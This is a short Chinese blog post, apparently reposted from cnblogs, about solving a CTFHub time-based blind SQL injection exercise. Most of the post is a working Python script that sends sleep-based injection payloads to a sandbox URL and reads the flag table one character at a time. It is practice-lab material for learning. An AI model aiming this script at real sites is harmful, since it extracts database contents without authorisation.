标签:out python sele sel get ascii bre mamicode star
ctfhub是个新手入门的好地方
前边的注入会了时间注入还是很简单的,有空合理的补充一下二分法和严密性
import requests
import time
url = "http://challenge-8a39656f3810752a.sandbox.ctfhub.com:10080/?id="
database = ""
for i in range(1,50):
#print("[%d]" %(i) )
for j in range(32,127):
#payload = "if(ascii(substr(database(),1,1))>1,sleep(1.5),1)
#payload = "if(ascii(substr(database(),%d,1))=%d,sleep(1),1)" %(i,j )
payload = "if(ascii(substr((select flag from flag),%d,1))=%d,sleep(1),1)" %(i,j )
start = time.time()
r = requests.get( url+payload ,timeout=5)
end_time = time.time()
#print(r.status_code)
if end_time - start > 1 :
#print(end_time - start)
database += chr(j)
print(database)
break
标签:out python sele sel get ascii bre mamicode star
原文地址:https://www.cnblogs.com/h3zh1/p/12861210.html